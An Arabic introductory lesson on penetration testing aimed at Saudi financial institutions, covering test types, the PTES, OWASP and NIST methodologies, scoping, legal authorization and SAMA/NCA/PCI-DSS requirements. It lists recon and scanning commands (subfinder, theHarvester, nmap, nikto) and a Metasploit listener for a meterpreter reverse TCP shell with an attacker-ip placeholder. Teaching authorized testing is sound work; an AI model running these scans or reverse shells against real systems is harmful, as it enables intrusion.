درس 21: مقدمة في اختبار الاختراق — المنهجيات والأدوات

ماذا ستتعلم في هذا الدرس

• ما هو اختبار الاختراق وكيف يختلف عن فحص الثغرات وتقييم المخاطر
• المنهجيات المعتمدة عالمياً: PTES وOWASP وNIST SP 800-115
• الأدوات الأساسية التي يستخدمها مختبرو الاختراق المحترفون
• كيف تخطط لاختبار اختراق ناجح في مؤسسة مالية سعودية

ما هو اختبار الاختراق بالضبط؟

اختبار الاختراق (Penetration Testing) هو محاكاة هجوم سيبراني مُتحكّم به ضد أنظمتك، يُنفذه متخصصون مُرخّصون بهدف اكتشاف الثغرات قبل أن يكتشفها المهاجمون الحقيقيون. تخيّل أنك تستأجر لصاً محترفاً لاختبار أقفال منزلك — هذا تماماً ما يفعله مختبر الاختراق مع أنظمتك الرقمية. الفرق الجوهري أن كل شيء يتم ضمن نطاق محدد (Scope) واتفاقية قانونية (Rules of Engagement) وتقرير تفصيلي بالنتائج والتوصيات.

يخلط كثيرون بين اختبار الاختراق وفحص الثغرات (Vulnerability Scanning). فحص الثغرات عملية آلية تستخدم أدوات مثل Nessus أو Qualys لاكتشاف نقاط الضعف المعروفة. أما اختبار الاختراق فيذهب أبعد من ذلك: يحاول المختبر استغلال هذه الثغرات فعلياً، ويربط بينها في سلاسل هجومية (Attack Chains)، ويحاكي سيناريوهات هجوم واقعية. فحص الثغرات يخبرك "بابك مفتوح"، أما اختبار الاختراق فيدخل من الباب ويُريك ماذا يمكن للمهاجم أن يصل إليه.

أنواع اختبار الاختراق

تُصنّف اختبارات الاختراق وفق مستوى المعلومات المتاحة للمختبر إلى ثلاثة أنواع رئيسية. في اختبار الصندوق الأسود (Black Box)، لا يحصل المختبر على أي معلومات مسبقة عن البنية التحتية — يبدأ من الصفر تماماً كما يفعل مهاجم خارجي. هذا النوع يكشف ما يمكن لمهاجم عشوائي من الإنترنت تحقيقه. في اختبار الصندوق الأبيض (White Box)، يحصل المختبر على وصول كامل للمعلومات: الكود المصدري، مخططات الشبكة، بيانات الدخول. هذا النوع أشمل ويكشف ثغرات أعمق. النوع الثالث هو الصندوق الرمادي (Gray Box)، وهو الأكثر شيوعاً في المؤسسات المالية، حيث يحصل المختبر على معلومات جزئية مثل حساب مستخدم عادي لمحاكاة تهديد داخلي.

مثال عملي: بنك سعودي يخضع لمراجعة SAMA طلب اختبار اختراق من نوع Gray Box لتطبيق الخدمات المصرفية عبر الجوال. حصل المختبرون على حساب عميل عادي، واكتشفوا ثغرة في API تتيح الوصول لبيانات عملاء آخرين من خلال تعديل رقم الحساب في الطلب (IDOR — Insecure Direct Object Reference). هذه الثغرة لم تكن لتُكتشف بفحص الثغرات الآلي وحده.

المنهجيات المعتمدة عالمياً

لا يعمل مختبر الاختراق المحترف بشكل عشوائي — بل يتبع منهجية محددة تضمن شمولية الاختبار وقابلية تكرار النتائج. إليك أبرز المنهجيات:

PTES (Penetration Testing Execution Standard) — المعيار الأكثر تفصيلاً، يقسم اختبار الاختراق إلى سبع مراحل: التفاعلات المبدئية (Pre-engagement)، جمع المعلومات (Intelligence Gathering)، نمذجة التهديدات (Threat Modeling)، تحليل الثغرات (Vulnerability Analysis)، الاستغلال (Exploitation)، ما بعد الاستغلال (Post-Exploitation)، وكتابة التقارير (Reporting). هذه المنهجية مثالية للمؤسسات المالية لأنها تغطي كل جانب بتفصيل دقيق.

OWASP Testing Guide — متخصصة في اختبار تطبيقات الويب والجوال. تحتوي على أكثر من 90 حالة اختبار مُصنّفة في 11 فئة. إذا كانت مؤسستك تقدم خدمات رقمية للعملاء، فهذه المنهجية ضرورية.

NIST SP 800-115 — الدليل التقني لاختبار وتقييم أمن المعلومات من المعهد الوطني الأمريكي. يُعدّ مرجعاً قوياً لتأطير عملية الاختبار ضمن إطار حوكمة أوسع، وهو ما تتوقعه جهات مثل SAMA عند مراجعة تقارير اختبار الاختراق.

الأدوات الأساسية لمختبر الاختراق

يحتاج مختبر الاختراق إلى ترسانة من الأدوات المتخصصة. إليك الأدوات التي لا غنى عنها في كل مرحلة:

مرحلة الاستطلاع:

# جمع معلومات DNS عن النطاق المستهدف
dig fyntralink.com ANY +noall +answer

# البحث عن نطاقات فرعية باستخدام Subfinder
subfinder -d target-bank.com.sa -o subdomains.txt

# استطلاع OSINT باستخدام theHarvester
theHarvester -d target-bank.com.sa -b google,linkedin -l 200

مرحلة الفحص:

# فحص شامل للمنافذ والخدمات باستخدام Nmap
nmap -sV -sC -O -p- --script=vuln target-ip -oA scan_results

# فحص تطبيق ويب باستخدام Nikto
nikto -h https://target-bank.com.sa -output nikto_report.html

مرحلة الاستغلال:

# استخدام Metasploit Framework
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker-ip
set LPORT 4444
exploit

أدوات أخرى أساسية تشمل: Burp Suite Professional لاختبار تطبيقات الويب، Hashcat وJohn the Ripper لكسر كلمات المرور، BloodHound لتحليل بيئات Active Directory، وImpacket لمهاجمة بروتوكولات Windows. توزيعة Kali Linux تجمع معظم هذه الأدوات في نظام تشغيل واحد جاهز للاستخدام.

التخطيط لاختبار اختراق ناجح

قبل أن تبدأ أي اختبار، تحتاج إلى تخطيط دقيق. المرحلة الأولى هي تحديد النطاق (Scope): ما الأنظمة المشمولة؟ ما عناوين IP والنطاقات المسموح باختبارها؟ هل يشمل الاختبار الهندسة الاجتماعية؟ هل هناك أنظمة حرجة يجب استثناؤها مثل أنظمة الإنتاج المصرفية الحية؟ كل هذا يُوثّق في وثيقة قواعد الاشتباك (Rules of Engagement).

المرحلة الثانية هي الحصول على التراخيص اللازمة. في السعودية، يجب أن يكون فريق اختبار الاختراق مُرخّصاً، ويجب الحصول على موافقة خطية من الإدارة العليا. وثيقة "الحصول على إذن" (Get Out of Jail Free Letter) ضرورية لحماية المختبرين قانونياً. كما يجب تحديد نافذة زمنية للاختبار وقنوات تصعيد في حال حدوث مشكلة تؤثر على عمل الأنظمة.

الربط بالواقع السعودي

يُلزم إطار SAMA CSCC المؤسسات المالية بإجراء اختبارات اختراق دورية ضمن مجال "إدارة الثغرات الأمنية" (Vulnerability Management). كما يتطلب ضوابط NCA ECC إجراء اختبارات اختراق سنوية على الأقل للأنظمة الحرجة. يشترط معيار PCI-DSS v4.0 اختبار اختراق لبيئة بيانات البطاقات المصرفية كل 6 أشهر أو بعد أي تغيير جوهري. المؤسسات المالية السعودية تحتاج لاختيار مزوّد اختبار اختراق مُعتمد يفهم هذه المتطلبات التنظيمية ويُخرج تقارير متوافقة مع ما تتوقعه SAMA في مراجعاتها.

أخطاء شائعة يجب تجنبها

• الاعتماد على فحص الثغرات فقط وتسميته اختبار اختراق: فحص Nessus أو Qualys ليس اختبار اختراق. المراجعون في SAMA يعرفون الفرق وسيرفضون تقريراً آلياً بدون تحليل يدوي واستغلال فعلي للثغرات.
• عدم تحديد النطاق بدقة: اختبار اختراق بنطاق غامض يعني نتائج غامضة وخلافات لاحقة. حدّد كل عنوان IP وكل تطبيق وكل سيناريو مطلوب اختباره كتابةً قبل البدء.
• تجاهل مرحلة ما بعد الاستغلال: كثير من الاختبارات تتوقف عند إثبات وجود الثغرة. المختبر المحترف يستمر ليُظهر الأثر الحقيقي: هل يمكن الوصول لبيانات العملاء؟ هل يمكن التحرك أفقياً في الشبكة؟ هذا ما يُقنع الإدارة بخطورة الثغرات.

ملخص الدرس

• اختبار الاختراق محاكاة هجوم حقيقي تكشف الثغرات التي لا يجدها الفحص الآلي — وهو مطلب تنظيمي من SAMA وNCA وPCI-DSS.
• اختر المنهجية المناسبة (PTES للشمولية، OWASP للتطبيقات، NIST للحوكمة) ونوع الاختبار الملائم (أسود، أبيض، رمادي) حسب أهدافك.
• التخطيط السليم — تحديد النطاق، الحصول على التراخيص، توثيق قواعد الاشتباك — هو نصف نجاح الاختبار.

الدرس القادم

في الدرس التالي سنتناول: استطلاع المعلومات — تقنيات OSINT للمبتدئين — ستتعلم كيف يجمع المهاجمون (ومختبرو الاختراق) المعلومات عن أهدافهم من مصادر مفتوحة قبل شنّ أي هجوم، وكيف تحمي مؤسستك من تسريب المعلومات.

هل تريد تطبيق ما تعلمته على مؤسستك؟ تواصل مع فريق فنترالينك للحصول على تقييم مجاني لمدى النضج السيبراني وفق SAMA CSCC.